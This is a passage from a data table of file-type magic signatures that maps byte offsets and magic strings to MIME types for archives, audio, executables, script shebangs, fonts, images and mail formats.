'=', 'HPAK', 'application/data'], [0L, 'string', '=', '\351,\001JAM application/data', ''], [2L, 'string', '=', '-lh0-', 'application/x-lha'], [2L, 'string', '=', '-lh1-', 'application/x-lha'], [2L, 'string', '=', '-lz4-', 'application/x-lha'], [2L, 'string', '=', '-lz5-', 'application/x-lha'], [2L, 'string', '=', '-lzs-', 'application/x-lha'], [2L, 'string', '=', '-lh -', 'application/x-lha'], [2L, 'string', '=', '-lhd-', 'application/x-lha'], [2L, 'string', '=', '-lh2-', 'application/x-lha'], [2L, 'string', '=', '-lh3-', 'application/x-lha'], [2L, 'string', '=', '-lh4-', 'application/x-lha'], [2L, 'string', '=', '-lh5-', 'application/x-lha'], [0L, 'string', '=', 'Rar!', 'application/x-rar'], [0L, 'string', '=', 'SQSH', 'application/data'], [0L, 'string', '=', 'UC2\032', 'application/data'], [0L, 'string', '=', 'PK\003\004', 'application/zip'], [20L, 'lelong', '=', 4257523676L, 'application/x-zoo'], [10L, 'string', '=', '# This is a shell archive', 'application/x-shar'], [0L, 'string', '=', '*STA', 'application/data'], [0L, 'string', '=', '2278', 'application/data'], [0L, 'beshort', '=', 560L, 'application/x-executable-file'], [0L, 'beshort', '=', 561L, 'application/x-executable-file'], [0L, 'string', '=', '\000\004\036\212\200', 'application/core'], [0L, 'string', '=', '.snd', 'audio/basic'], [0L, 'lelong', '=', 6583086L, 'audio/basic'], [0L, 'string', '=', 'MThd', 'audio/midi'], [0L, 'string', '=', 'CTMF', 'audio/x-cmf'], [0L, 'string', '=', 'SBI', 'audio/x-sbi'], [0L, 'string', '=', 'Creative Voice File', 'audio/x-voc'], [0L, 'belong', '=', 1314148939L, 'audio/x-multitrack'], [0L, 'string', '=', 'RIFF', 'audio/x-wav'], [0L, 'string', '=', 'EMOD', 'audio/x-emod'], [0L, 'belong', '=', 779248125L, 'audio/x-pn-realaudio'], [0L, 'string', '=', 'MTM', 'audio/x-multitrack'], [0L, 'string', '=', 'if', 'audio/x-669-mod'], [0L, 'string', '=', 'FAR', 'audio/mod'], [0L, 'string', '=', 'MAS_U', 'audio/x-multimate-mod'], [44L, 'string', '=', 'SCRM', 'audio/x-st3-mod'], [0L, 'string', '=', 'GF1PATCH110\000ID#000002\000', 'audio/x-gus-patch'], [0L, 'string', '=', 'GF1PATCH100\000ID#000002\000', 'audio/x-gus-patch'], [0L, 'string', '=', 'JN', 'audio/x-669-mod'], [0L, 'string', '=', 'UN05', 'audio/x-mikmod-uni'], [0L, 'string', '=', 'Extended Module:', 'audio/x-ft2-mod'], [21L, 'string', '=', '!SCREAM!', 'audio/x-st2-mod'], [1080L, 'string', '=', 'M.K.', 'audio/x-protracker-mod'], [1080L, 'string', '=', 'M!K!', 'audio/x-protracker-mod'], [1080L, 'string', '=', 'FLT4', 'audio/x-startracker-mod'], [1080L, 'string', '=', '4CHN', 'audio/x-fasttracker-mod'], [1080L, 'string', '=', '6CHN', 'audio/x-fasttracker-mod'], [1080L, 'string', '=', '8CHN', 'audio/x-fasttracker-mod'], [1080L, 'string', '=', 'CD81', 'audio/x-oktalyzer-mod'], [1080L, 'string', '=', 'OKTA', 'audio/x-oktalyzer-mod'], [1080L, 'string', '=', '16CN', 'audio/x-taketracker-mod'], [1080L, 'string', '=', '32CN', 'audio/x-taketracker-mod'], [0L, 'string', '=', 'TOC', 'audio/x-toc'], [0L, 'short', '=', 3401L, 'application/x-executable-file'], [0L, 'long', '=', 406L, 'application/x-executable-file'], [0L, 'short', '=', 406L, 'application/x-executable-file'], [0L, 'short', '=', 3001L, 'application/x-executable-file'], [0L, 'lelong', '=', 314L, 'application/x-executable-file'], [0L, 'string', '=', '//', 'text/cpp'], [0L, 'string', '=', '\\\\1cw\\', 'application/data'], [0L, 'string', '=', '\\\\1cw', 'application/data'], [0L, 'belong&0xffffff00', '=', 2231440384L, 'application/data'], [0L, 'belong&0xffffff00', '=', 2231487232L, 'application/data'], [0L, 'short', '=', 575L, 'application/x-executable-file'], [0L, 'short', '=', 577L, 'application/x-executable-file'], [4L, 'string', '=', 'pipe', 'application/data'], [4L, 'string', '=', 'prof', 'application/data'], [0L, 'string', '=', ': shell', 'application/data'], [0L, 'string', '=', '#!/bin/sh', 'application/x-sh'], [0L, 'string', '=', '#! /bin/sh', 'application/x-sh'], [0L, 'string', '=', '#! /bin/sh', 'application/x-sh'], [0L, 'string', '=', '#!/bin/csh', 'application/x-csh'], [0L, 'string', '=', '#! /bin/csh', 'application/x-csh'], [0L, 'string', '=', '#! /bin/csh', 'application/x-csh'], [0L, 'string', '=', '#!/bin/ksh', 'application/x-ksh'], [0L, 'string', '=', '#! /bin/ksh', 'application/x-ksh'], [0L, 'string', '=', '#! /bin/ksh', 'application/x-ksh'], [0L, 'string', '=', '#!/bin/tcsh', 'application/x-csh'], [0L, 'string', '=', '#! /bin/tcsh', 'application/x-csh'], [0L, 'string', '=', '#! /bin/tcsh', 'application/x-csh'], [0L, 'string', '=', '#!/usr/local/tcsh', 'application/x-csh'], [0L, 'string', '=', '#! /usr/local/tcsh', 'application/x-csh'], [0L, 'string', '=', '#!/usr/local/bin/tcsh', 'application/x-csh'], [0L, 'string', '=', '#! /usr/local/bin/tcsh', 'application/x-csh'], [0L, 'string', '=', '#! /usr/local/bin/tcsh', 'application/x-csh'], [0L, 'string', '=', '#!/usr/local/bin/zsh', 'application/x-zsh'], [0L, 'string', '=', '#! /usr/local/bin/zsh', 'application/x-zsh'], [0L, 'string', '=', '#! /usr/local/bin/zsh', 'application/x-zsh'], [0L, 'string', '=', '#!/usr/local/bin/ash', 'application/x-sh'], [0L, 'string', '=', '#! /usr/local/bin/ash', 'application/x-zsh'], [0L, 'string', '=', '#! /usr/local/bin/ash', 'application/x-zsh'], [0L, 'string', '=', '#!/usr/local/bin/ae', 'text/script'], [0L, 'string', '=', '#! /usr/local/bin/ae', 'text/script'], [0L, 'string', '=', '#! /usr/local/bin/ae', 'text/script'], [0L, 'string', '=', '#!/bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#! /bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#! /bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#!/usr/bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#!/usr/local/bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/local/bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/local/bin/nawk', 'application/x-awk'], [0L, 'string', '=', '#!/bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#! /bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#! /bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#!/usr/bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#!/usr/local/bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/local/bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/local/bin/gawk', 'application/x-awk'], [0L, 'string', '=', '#!/bin/awk', 'application/x-awk'], [0L, 'string', '=', '#! /bin/awk', 'application/x-awk'], [0L, 'string', '=', '#! /bin/awk', 'application/x-awk'], [0L, 'string', '=', '#!/usr/bin/awk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/bin/awk', 'application/x-awk'], [0L, 'string', '=', '#! /usr/bin/awk', 'application/x-awk'], [0L, 'string', '=', 'BEGIN', 'application/x-awk'], [0L, 'string', '=', '#!/bin/perl', 'application/x-perl'], [0L, 'string', '=', '#! /bin/perl', 'application/x-perl'], [0L, 'string', '=', '#! /bin/perl', 'application/x-perl'], [0L, 'string', '=', 'eval "exec /bin/perl', 'application/x-perl'], [0L, 'string', '=', '#!/usr/bin/perl', 'application/x-perl'], [0L, 'string', '=', '#! /usr/bin/perl', 'application/x-perl'], [0L, 'string', '=', '#! /usr/bin/perl', 'application/x-perl'], [0L, 'string', '=', 'eval "exec /usr/bin/perl', 'application/x-perl'], [0L, 'string', '=', '#!/usr/local/bin/perl', 'application/x-perl'], [0L, 'string', '=', '#! /usr/local/bin/perl', 'application/x-perl'], [0L, 'string', '=', '#! /usr/local/bin/perl', 'application/x-perl'], [0L, 'string', '=', 'eval "exec /usr/local/bin/perl', 'application/x-perl'], [0L, 'string', '=', '#!/bin/python', 'application/x-python'], [0L, 'string', '=', '#! /bin/python', 'application/x-python'], [0L, 'string', '=', '#! /bin/python', 'application/x-python'], [0L, 'string', '=', 'eval "exec /bin/python', 'application/x-python'], [0L, 'string', '=', '#!/usr/bin/python', 'application/x-python'], [0L, 'string', '=', '#! /usr/bin/python', 'application/x-python'], [0L, 'string', '=', '#! /usr/bin/python', 'application/x-python'], [0L, 'string', '=', 'eval "exec /usr/bin/python', 'application/x-python'], [0L, 'string', '=', '#!/usr/local/bin/python', 'application/x-python'], [0L, 'string', '=', '#! /usr/local/bin/python', 'application/x-python'], [0L, 'string', '=', '#! /usr/local/bin/python', 'application/x-python'], [0L, 'string', '=', 'eval "exec /usr/local/bin/python', 'application/x-python'], [0L, 'string', '=', '#!/usr/bin/env python', 'application/x-python'], [0L, 'string', '=', '#! /usr/bin/env python', 'application/x-python'], [0L, 'string', '=', '#!/bin/rc', 'text/script'], [0L, 'string', '=', '#! /bin/rc', 'text/script'], [0L, 'string', '=', '#! /bin/rc', 'text/script'], [0L, 'string', '=', '#!/bin/bash', 'application/x-sh'], [0L, 'string', '=', '#! /bin/bash', 'application/x-sh'], [0L, 'string', '=', '#! /bin/bash', 'application/x-sh'], [0L, 'string', '=', '#!/usr/local/bin/bash', 'application/x-sh'], [0L, 'string', '=', '#! /usr/local/bin/bash', 'application/x-sh'], [0L, 'string', '=', '#! /usr/local/bin/bash', 'application/x-sh'], [0L, 'string', '=', '#! /', 'text/script'], [0L, 'string', '=', '#! /', 'text/script'], [0L, 'string', '=', '#!/', 'text/script'], [0L, 'string', '=', '#! text/script', ''], [0L, 'string', '=', '\037\235', 'application/compress'], [0L, 'string', '=', '\037\213', 'application/x-gzip'], [0L, 'string', '=', '\037\036', 'application/data'], [0L, 'short', '=', 17437L, 'application/data'], [0L, 'short', '=', 8191L, 'application/data'], [0L, 'string', '=', '\377\037', 'application/data'], [0L, 'short', '=', 145405L, 'application/data'], [0L, 'string', '=', 'BZh', 'application/x-bzip2'], [0L, 'leshort', '=', 65398L, 'application/data'], [0L, 'leshort', '=', 65142L, 'application/data'], [0L, 'leshort', '=', 64886L, 'application/x-lzh'], [0L, 'string', '=', '\037\237', 'application/data'], [0L, 'string', '=', '\037\236', 'application/data'], [0L, 'string', '=', '\037\240', 'application/data'], [0L, 'string', '=', 'BZ', 'application/x-bzip'], [0L, 'string', '=', '\211LZO\000\015\012\032\012', 'application/data'], [0L, 'belong', '=', 507L, 'application/x-object-file'], [0L, 'belong', '=', 513L, 'application/x-executable-file'], [0L, 'belong', '=', 515L, 'application/x-executable-file'], [0L, 'belong', '=', 517L, 'application/x-executable-file'], [0L, 'belong', '=', 70231L, 'application/core'], [24L, 'belong', '=', 60011L, 'application/data'], [24L, 'belong', '=', 60012L, 'application/data'], [24L, 'belong', '=', 60013L, 'application/data'], [24L, 'belong', '=', 60014L, 'application/data'], [0L, 'belong', '=', 601L, 'application/x-object-file'], [0L, 'belong', '=', 607L, 'application/data'], [0L, 'belong', '=', 324508366L, 'application/x-gdbm'], [0L, 'lelong', '=', 324508366L, 'application/x-gdbm'], [0L, 'string', '=', 'GDBM', 'application/x-gdbm'], [0L, 'belong', '=', 398689L, 'application/x-db'], [0L, 'belong', '=', 340322L, 'application/x-db'], [0L, 'string', '=', '<list>\012<protocol bbn-m', 'application/data'], [0L, 'string', '=', 'diff text/x-patch', ''], [0L, 'string', '=', '*** text/x-patch', ''], [0L, 'string', '=', 'Only in text/x-patch', ''], [0L, 'string', '=', 'Common subdirectories: text/x-patch', ''], [0L, 'string', '=', '!<arch>\012________64E', 'application/data'], [0L, 'leshort', '=', 387L, 'application/x-executable-file'], [0L, 'leshort', '=', 392L, 'application/x-executable-file'], [0L, 'leshort', '=', 399L, 'application/x-object-file'], [0L, 'string', '=', '\377\377\177', 'application/data'], [0L, 'string', '=', '\377\377|', 'application/data'], [0L, 'string', '=', '\377\377~', 'application/data'], [0L, 'string', '=', '\033c\033', 'application/data'], [0L, 'long', '=', 4553207L, 'image/x11'], [0L, 'string', '=', '!<PDF>!\012', 'application/x-prof'], [0L, 'short', '=', 1281L, 'application/x-locale'], [24L, 'belong', '=', 60012L, 'application/x-dump'], [24L, 'belong', '=', 60011L, 'application/x-dump'], [24L, 'lelong', '=', 60012L, 'application/x-dump'], [24L, 'lelong', '=', 60011L, 'application/x-dump'], [0L, 'string', '=', '\177ELF', 'application/x-executable-file'], [0L, 'short', '=', 340L, 'application/data'], [0L, 'short', '=', 341L, 'application/x-executable-file'], [1080L, 'leshort', '=', 61267L, 'application/x-linux-ext2fs'], [0L, 'string', '=', '\366\366\366\366', 'application/x-pc-floppy'], [774L, 'beshort', '=', 55998L, 'application/data'], [510L, 'leshort', '=', 43605L, 'application/data'], [1040L, 'leshort', '=', 4991L, 'application/x-filesystem'], [1040L, 'leshort', '=', 5007L, 'application/x-filesystem'], [1040L, 'leshort', '=', 9320L, 'application/x-filesystem'], [1040L, 'leshort', '=', 9336L, 'application/x-filesystem'], [0L, 'string', '=', '-rom1fs-\000', 'application/x-filesystem'], [395L, 'string', '=', 'OS/2', 'application/x-bootable'], [0L, 'string', '=', 'FONT', 'font/x-vfont'], [0L, 'short', '=', 436L, 'font/x-vfont'], [0L, 'short', '=', 17001L, 'font/x-vfont'], [0L, 'string', '=', '%!PS-AdobeFont-1.0', 'font/type1'], [6L, 'string', '=', '%!PS-AdobeFont-1.0', 'font/type1'], [0L, 'belong', '=', 4L, 'font/x-snf'], [0L, 'lelong', '=', 4L, 'font/x-snf'], [0L, 'string', '=', 'STARTFONT font/x-bdf', ''], [0L, 'string', '=', '\001fcp', 'font/x-pcf'], [0L, 'string', '=', 'D1.0\015', 'font/x-speedo'], [0L, 'string', '=', 'flf', 'font/x-figlet'], [0L, 'string', '=', 'flc', 'application/x-font'], [0L, 'belong', '=', 335698201L, 'font/x-libgrx'], [0L, 'belong', '=', 4282797902L, 'font/x-dos'], [7L, 'belong', '=', 4540225L, 'font/x-dos'], [7L, 'belong', '=', 5654852L, 'font/x-dos'], [4098L, 'string', '=', 'DOSFONT', 'font/x-dos'], [0L, 'string', '=', '<MakerFile', 'application/x-framemaker'], [0L, 'string', '=', '<MIFFile', 'application/x-framemaker'], [0L, 'string', '=', '<MakerDictionary', 'application/x-framemaker'], [0L, 'string', '=', '<MakerScreenFont', 'font/x-framemaker'], [0L, 'string', '=', '<MML', 'application/x-framemaker'], [0L, 'string', '=', '<BookFile', 'application/x-framemaker'], [0L, 'string', '=', '<Maker', 'application/x-framemaker'], [0L, 'lelong&0377777777', '=', 41400407L, 'application/x-executable-file'], [0L, 'lelong&0377777777', '=', 41400410L, 'application/x-executable-file'], [0L, 'lelong&0377777777', '=', 41400413L, 'application/x-executable-file'], [0L, 'lelong&0377777777', '=', 41400314L, 'application/x-executable-file'], [7L, 'string', '=', '\357\020\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000', 'application/core'], [0L, 'lelong', '=', 11421044151L, 'application/data'], [0L, 'string', '=', 'GIMP Gradient', 'application/x-gimp-gradient'], [0L, 'string', '=', 'gimp xcf', 'application/x-gimp-image'], [20L, 'string', '=', 'GPAT', 'application/x-gimp-pattern'], [20L, 'string', '=', 'GIMP', 'application/x-gimp-brush'], [0L, 'string', '=', '\336\022\004\225', 'application/x-locale'], [0L, 'string', '=', '\225\004\022\336', 'application/x-locale'], [0L, 'beshort', '=', 627L, 'application/x-executable-file'], [0L, 'beshort', '=', 624L, 'application/x-executable-file'], [0L, 'string', '=', '\000\001\000\000\000', 'font/ttf'], [0L, 'long', '=', 1203604016L, 'application/data'], [0L, 'long', '=', 1702407010L, 'application/data'], [0L, 'long', '=', 1003405017L, 'application/data'], [0L, 'long', '=', 1602007412L, 'application/data'], [0L, 'belong', '=', 34603270L, 'application/x-object-file'], [0L, 'belong', '=', 34603271L, 'application/x-executable-file'], [0L, 'belong', '=', 34603272L, 'application/x-executable-file'], [0L, 'belong', '=', 34603275L, 'application/x-executable-file'], [0L, 'belong', '=', 34603278L, 'application/x-library-file'], [0L, 'belong', '=', 34603277L, 'application/x-library-file'], [0L, 'belong', '=', 34865414L, 'application/x-object-file'], [0L, 'belong', '=', 34865415L, 'application/x-executable-file'], [0L, 'belong', '=', 34865416L, 'application/x-executable-file'], [0L, 'belong', '=', 34865419L, 'application/x-executable-file'], [0L, 'belong', '=', 34865422L, 'application/x-library-file'], [0L, 'belong', '=', 34865421L, 'application/x-object-file'], [0L, 'belong', '=', 34275590L, 'application/x-object-file'], [0L, 'belong', '=', 34275591L, 'application/x-executable-file'], [0L, 'belong', '=', 34275592L, 'application/x-executable-file'], [0L, 'belong', '=', 34275595L, 'application/x-executable-file'], [0L, 'belong', '=', 34275598L, 'application/x-library-file'], [0L, 'belong', '=', 34275597L, 'application/x-library-file'], [0L, 'belong', '=', 557605234L, 'application/x-ar'], [0L, 'long', '=', 34078982L, 'application/x-executable-file'], [0L, 'long', '=', 34078983L, 'application/x-executable-file'], [0L, 'long', '=', 34078984L, 'application/x-executable-file'], [0L, 'belong', '=', 34341128L, 'application/x-executable-file'], [0L, 'belong', '=', 34341127L, 'application/x-executable-file'], [0L, 'belong', '=', 34341131L, 'application/x-executable-file'], [0L, 'belong', '=', 34341126L, 'application/x-executable-file'], [0L, 'belong', '=', 34210056L, 'application/x-executable-file'], [0L, 'belong', '=', 34210055L, 'application/x-executable-file'], [0L, 'belong', '=', 34341134L, 'application/x-library-file'], [0L, 'belong', '=', 34341133L, 'application/x-library-file'], [0L, 'long', '=', 65381L, 'application/x-library-file'], [0L, 'long', '=', 34275173L, 'application/x-library-file'], [0L, 'long', '=', 34406245L, 'application/x-library-file'], [0L, 'long', '=', 34144101L, 'application/x-library-file'], [0L, 'long', '=', 22552998L, 'application/core'], [0L, 'long', '=', 1302851304L, 'font/x-hp-windows'], [0L, 'string', '=', 'Bitmapfile', 'image/unknown'], [0L, 'string', '=', 'IMGfile', 'CIS image/unknown'], [0L, 'long', '=', 34341132L, 'application/x-lisp'], [0L, 'string', '=', 'msgcat01', 'application/x-locale'], [0L, 'string', '=', 'HPHP48-', 'HP48 binary'], [0L, 'string', '=', '%%HP:', 'HP48 text'], [0L, 'beshort', '=', 200L, 'hp200 (68010) BSD'], [0L, 'beshort', '=', 300L, 'hp300 (68020+68881) BSD'], [0L, 'beshort', '=', 537L, '370 XA sysV executable'], [0L, 'beshort', '=', 532L, '370 XA sysV pure executable'], [0L, 'beshort', '=', 54001L, '370 sysV pure executable'], [0L, 'beshort', '=', 55001L, '370 XA sysV pure executable'], [0L, 'beshort', '=', 56401L, '370 sysV executable'], [0L, 'beshort', '=', 57401L, '370 XA sysV executable'], [0L, 'beshort', '=', 531L, 'SVR2 executable (Amdahl-UTS)'], [0L, 'beshort', '=', 534L, 'SVR2 pure executable (Amdahl-UTS)'], [0L, 'beshort', '=', 530L, 'SVR2 pure executable (USS/370)'], [0L, 'beshort', '=', 535L, 'SVR2 executable (USS/370)'], [0L, 'beshort', '=', 479L, 'executable (RISC System/6000 V3.1) or obj module'], [0L, 'beshort', '=', 260L, 'shared library'], [0L, 'beshort', '=', 261L, 'ctab data'], [0L, 'beshort', '=', 65028L, 'structured file'], [0L, 'string', '=', '0xabcdef', 'AIX message catalog'], [0L, 'belong', '=', 505L, 'AIX compiled message catalog'], [0L, 'string', '=', '<aiaff>', 'archive'], [0L, 'string', '=', 'FORM', 'IFF data'], [0L, 'string', '=', 'P1', 'image/x-portable-bitmap'], [0L, 'string', '=', 'P2', 'image/x-portable-graymap'], [0L, 'string', '=', 'P3', 'image/x-portable-pixmap'], [0L, 'string', '=', 'P4', 'image/x-portable-bitmap'], [0L, 'string', '=', 'P5', 'image/x-portable-graymap'], [0L, 'string', '=', 'P6', 'image/x-portable-pixmap'], [0L, 'string', '=', 'IIN1', 'image/tiff'], [0L, 'string', '=', 'MM\000*', 'image/tiff'], [0L, 'string', '=', 'II*\000', 'image/tiff'], [0L, 'string', '=', '\211PNG', 'image/x-png'], [1L, 'string', '=', 'PNG', 'image/x-png'], [0L, 'string', '=', 'GIF8', 'image/gif'], [0L, 'string', '=', '\361\000@\273', 'image/x-cmu-raster'], [0L, 'string', '=', 'id=ImageMagick', 'MIFF image data'], [0L, 'long', '=', 1123028772L, 'Artisan image data'], [0L, 'string', '=', '#FIG', 'FIG image text'], [0L, 'string', '=', 'ARF_BEGARF', 'PHIGS clear text archive'], [0L, 'string', '=', '@(#)SunPHIGS', 'SunPHIGS'], [0L, 'string', '=', 'GKSM', 'GKS Metafile'], [0L, 'string', '=', 'BEGMF', 'clear text Computer Graphics Metafile'], [0L, 'beshort&0xffe0', '=', 32L, 'binary Computer Graphics Metafile'], [0L, 'beshort', '=', 12320L, 'character Computer Graphics Metafile'], [0L, 'string', '=', 'yz', 'MGR bitmap, modern format, 8-bit aligned'], [0L, 'string', '=', 'zz', 'MGR bitmap, old format, 1-bit deep, 16-bit aligned'], [0L, 'string', '=', 'xz', 'MGR bitmap, old format, 1-bit deep, 32-bit aligned'], [0L, 'string', '=', 'yx', 'MGR bitmap, modern format, squeezed'], [0L, 'string', '=', '%bitmap\000', 'FBM image data'], [1L, 'string', '=', 'PC Research, Inc', 'group 3 fax data'], [0L, 'beshort', '=', 65496L, 'image/jpeg'], [0L, 'string', '=', 'hsi1', 'image/x-jpeg-proprietary'], [0L, 'string', '=', 'BM', 'image/x-bmp'], [0L, 'string', '=', 'IC', 'image/x-ico'], [0L, 'string', '=', 'PI', 'PC pointer image data'], [0L, 'string', '=', 'CI', 'PC color icon data'], [0L, 'string', '=', 'CP', 'PC color pointer image data'], [0L, 'string', '=', '/* XPM */', 'X pixmap image text'], [0L, 'leshort', '=', 52306L, 'RLE image data,'], [0L, 'string', '=', 'Imagefile version-', 'iff image data'], [0L, 'belong', '=', 1504078485L, 'x/x-image-sun-raster'], [0L, 'beshort', '=', 474L, 'x/x-image-sgi'], [0L, 'string', '=', 'IT01', 'FIT image data'], [0L, 'string', '=', 'IT02', 'FIT image data'], [2048L, 'string', '=', 'PCD_IPI', 'x/x-photo-cd-pack-file'], [0L, 'string', '=', 'PCD_OPA', 'x/x-photo-cd-overfiew-file'], [0L, 'string', '=', 'SIMPLE =', 'FITS image data'], [0L, 'string', '=', 'This is a BitMap file', 'Lisp Machine bit-array-file'], [0L, 'string', '=', '!!', 'Bennet Yee\'s "face" format'], [0L, 'beshort', '=', 4112L, 'PEX Binary Archive'], [3000L, 'string', '=', 'Visio (TM) Drawing', '%s'], [0L, 'leshort', '=', 502L, 'basic-16 executable'], [0L, 'leshort', '=', 503L, 'basic-16 executable (TV)'], [0L, 'leshort', '=', 510L, 'application/x-executable-file'], [0L, 'leshort', '=', 511L, 'application/x-executable-file'], [0L, 'leshort', '=', 512L, 'application/x-executable-file'], [0L, 'leshort', '=', 522L, 'application/x-executable-file'], [0L, 'leshort', '=', 514L, 'application/x-executable-file'], [0L, 'string', '=', '\210OPS', 'Interleaf saved data'], [0L, 'string', '=', '<!OPS', 'Interleaf document text'], [4L, 'string', '=', 'pgscriptver', 'IslandWrite document'], [13L, 'string', '=', 'DrawFile', 'IslandDraw document'], [0L, 'leshort&0xFFFC', '=', 38400L, 'little endian ispell'], [0L, 'beshort&0xFFFC', '=', 38400L, 'big endian ispell'], [0L, 'belong', '=', 3405691582L, 'compiled Java class data,'], [0L, 'beshort', '=', 44269L, 'Java serialization data'], [0L, 'string', '=', 'KarmaRHD', 'Version Karma Data Structure Version'], [0L, 'string', '=', 'lect', 'DEC SRC Virtual Paper Lectern file'], [53L, 'string', '=', 'yyprevious', 'C program text (from lex)'], [21L, 'string', '=', 'generated by flex', 'C program text (from flex)'], [0L, 'string', '=', '%{', 'lex description text'], [0L, 'short', '=', 32768L, 'lif file'], [0L, 'lelong', '=', 6553863L, 'Linux/i386 impure executable (OMAGIC)'], [0L, 'lelong', '=', 6553864L, 'Linux/i386 pure executable (NMAGIC)'], [0L, 'lelong', '=', 6553867L, 'Linux/i386 demand-paged executable (ZMAGIC)'], [0L, 'lelong', '=', 6553804L, 'Linux/i386 demand-paged executable (QMAGIC)'], [0L, 'string', '=', '\007\001\000', 'Linux/i386 object file'], [0L, 'string', '=', '\001\003\020\004', 'Linux-8086 impure executable'], [0L, 'string', '=', '\001\003 \004', 'Linux-8086 executable'], [0L, 'string', '=', '\243\206\001\000', 'Linux-8086 object file'], [0L, 'string', '=', '\001\003\020\020', 'Minix-386 impure executable'], [0L, 'string', '=', '\001\003 \020', 'Minix-386 executable'], [0L, 'string', '=', '*nazgul*', 'Linux compiled message catalog'], [216L, 'lelong', '=', 421L, 'Linux/i386 core file'], [2L, 'string', '=', 'LILO', 'Linux/i386 LILO boot/chain loader'], [0L, 'string', '=', '0.9', ''], [0L, 'leshort', '=', 1078L, 'font/linux-psf'], [4086L, 'string', '=', 'SWAP-SPACE', 'Linux/i386 swap file'], [0L, 'leshort', '=', 387L, 'ECOFF alpha'], [514L, 'string', '=', 'HdrS', 'Linux kernel'], [0L, 'belong', '=', 3099592590L, 'Linux kernel'], [0L, 'string', '=', 'Begin3', 'Linux Software Map entry text'], [0L, 'string', '=', ';;', 'Lisp/Scheme program text'], [0L, 'string', '=', '\012(', 'byte-compiled Emacs-Lisp program data'], [0L, 'string', '=', ';ELC\023\000\000\000', 'byte-compiled Emacs-Lisp program data'], [0L, 'string', '=', "(SYSTEM::VERSION '", 'CLISP byte-compiled Lisp program text'], [0L, 'long', '=', 1886817234L, 'CLISP memory image data'], [0L, 'long', '=', 3532355184L, 'CLISP memory image data, other endian'], [0L, 'long', '=', 3725722773L, 'GNU-format message catalog data'], [0L, 'long', '=', 2500072158L, 'GNU-format message catalog data'], [0L, 'belong', '=', 3405691582L, 'mach-o fat file'], [0L, 'belong', '=', 4277009102L, 'mach-o'], [11L, 'string', '=', 'must be converted with BinHex', 'BinHex binary text'], [0L, 'string', '=', 'SIT!', 'StuffIt Archive (data)'], [65L, 'string', '=', 'SIT!', 'StuffIt Archive (rsrc + data)'], [0L, 'string', '=', 'SITD', 'StuffIt Deluxe (data)'], [65L, 'string', '=', 'SITD', 'StuffIt Deluxe (rsrc + data)'], [0L, 'string', '=', 'Seg', 'StuffIt Deluxe Segment (data)'], [65L, 'string', '=', 'Seg', 'StuffIt Deluxe Segment (rsrc + data)'], [0L, 'string', '=', 'APPL', 'Macintosh Application (data)'], [65L, 'string', '=', 'APPL', 'Macintosh Application (rsrc + data)'], [0L, 'string', '=', 'zsys', 'Macintosh System File (data)'], [65L, 'string', '=', 'zsys', 'Macintosh System File(rsrc + data)'], [0L, 'string', '=', 'FNDR', 'Macintosh Finder (data)'], [65L, 'string', '=', 'FNDR', 'Macintosh Finder(rsrc + data)'], [0L, 'string', '=', 'libr', 'Macintosh Library (data)'], [65L, 'string', '=', 'libr', 'Macintosh Library(rsrc + data)'], [0L, 'string', '=', 'shlb', 'Macintosh Shared Library (data)'], [65L, 'string', '=', 'shlb', 'Macintosh Shared Library(rsrc + data)'], [0L, 'string', '=', 'cdev', 'Macintosh Control Panel (data)'], [65L, 'string', '=', 'cdev', 'Macintosh Control Panel(rsrc + data)'], [0L, 'string', '=', 'INIT', 'Macintosh Extension (data)'], [65L, 'string', '=', 'INIT', 'Macintosh Extension(rsrc + data)'], [0L, 'string', '=', 'FFIL', 'font/ttf'], [65L, 'string', '=', 'FFIL', 'font/ttf'], [0L, 'string', '=', 'LWFN', 'font/type1'], [65L, 'string', '=', 'LWFN', 'font/type1'], [0L, 'string', '=', 'PACT', 'Macintosh Compact Pro Archive (data)'], [65L, 'string', '=', 'PACT', 'Macintosh Compact Pro Archive(rsrc + data)'], [0L, 'string', '=', 'ttro', 'Macintosh TeachText File (data)'], [65L, 'string', '=', 'ttro', 'Macintosh TeachText File(rsrc + data)'], [0L, 'string', '=', 'TEXT', 'Macintosh TeachText File (data)'], [65L, 'string', '=', 'TEXT', 'Macintosh TeachText File(rsrc + data)'], [0L, 'string', '=', 'PDF', 'Macintosh PDF File (data)'], [65L, 'string', '=', 'PDF', 'Macintosh PDF File(rsrc + data)'], [0L, 'string', '=', '# Magic', 'magic text file for file(1) cmd'], [0L, 'string', '=', 'Relay-Version:', 'old news text'], [0L, 'string', '=', '#! rnews', 'batched news text'], [0L, 'string', '=', 'N#! rnews', 'mailed, batched news text'], [0L, 'string', '=', 'Forward to', 'mail forwarding text'], [0L, 'string', '=', 'Pipe to', 'mail piping text'], [0L, 'string', '=', 'Return-Path:', 'message/rfc822'], [0L, 'string', '=', 'Path:', 'message/news'], [0L, 'string', '=', 'Xref:', 'message/news'], [0L, 'string', '=', 'From:', 'message/rfc822'], [0L, 'string', '=', 'Article', 'message/news'], [0L, 'string', '=', 'BABYL', 'message/x-gnu-rmail'], [0L, 'string', '=', 'Received:', 'message/rfc822'], [0L, 'string', '=', 'MIME-Version:', 'MIME entity text'], [0L, 'string', '=', 'Content-Type: ', ''], [0L, 'string', '=', 'Content-Type:', ''], [0L, 'long', '=', 31415L, 'Mirage Assembler m.out executable'], [0L, 'string', '=', '\311\304', 'ID tags data'], [0L, 'string', '=', '\001\001\001\001', 'MMDF mailbox'], [4L, 'string', '=', 'Research,', 'Digifax-G3-File'], [0L, 'short', '=', 256L, 'raw G3 data, 